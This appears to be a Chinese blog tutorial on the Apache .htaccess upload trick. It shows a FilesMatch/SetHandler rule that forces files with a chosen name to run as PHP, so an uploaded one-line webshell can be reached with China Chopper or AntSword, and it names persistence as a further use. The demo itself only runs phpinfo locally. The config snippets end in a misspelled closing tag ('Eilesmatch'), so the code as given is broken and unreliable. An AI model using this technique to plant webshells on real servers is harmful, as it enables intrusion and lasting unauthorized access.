.htaccess“文件上传漏洞”原理及实例分析

.htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置,通过.htaccess文件可以实现网页301重定向、自定义404页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

 

需要用到的代码如下:

<FilesMatch "cimer">
Sethandler application/x-httpd-php
</Eilesmatch >

 

一、.htaccess 文件上传漏洞 原理

通过.htaccess文件,调用php的解析器解析一个文件名,只要包含"cimer"这个字符串的任意文件。这个"cimer"的内容如果是一句话木马,即可利用中国菜刀或中国蚁剑进行连接。

 

注意:cimer 这个名字是可以随意更改的!

 

二、.htaccess 文件上传漏洞 本地示例

 

1、把上面的代码添加到 .htaccess ;我这就直接写到 F:\phpStudy\WWW\ .htaccess ;

<FilesMatch "xiaodi">
Sethandler application/x-httpd-php
</Eilesmatch >

 

2、创建一个xiaodi.html,并写入如下代码:

<?php
phpinfo();
?>

 

3、直接访问 http://127.0.0.1/xiaodi/xiaodi.html ,就会出现phpinfo的界面;

phpinfo

 

实战意义:

1、如果存在可以上传 .htaccess 文件,就可以直接利用此规则解析;

2、如果存在修改文件权限,就直接修改解析规则;

 

拓展利用:权限维持

付杰
JAVA从入门到精通视频教程(实战)
  • ¥ 99.0元
  • 市场价:99.0元
购买
详情
C++基础入门到进阶视频教程
  • ¥ 498.0元
  • 市场价:498.0元
购买
详情
数据库基础篇:SQLServer+MySQL+HeidiSQL
  • ¥ 189.0元
  • 市场价:269.0元
购买
详情
React.js视频教程:全新React.js16.12技术合集
  • ¥ 69.0元
  • 市场价:69.0元
购买
详情

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: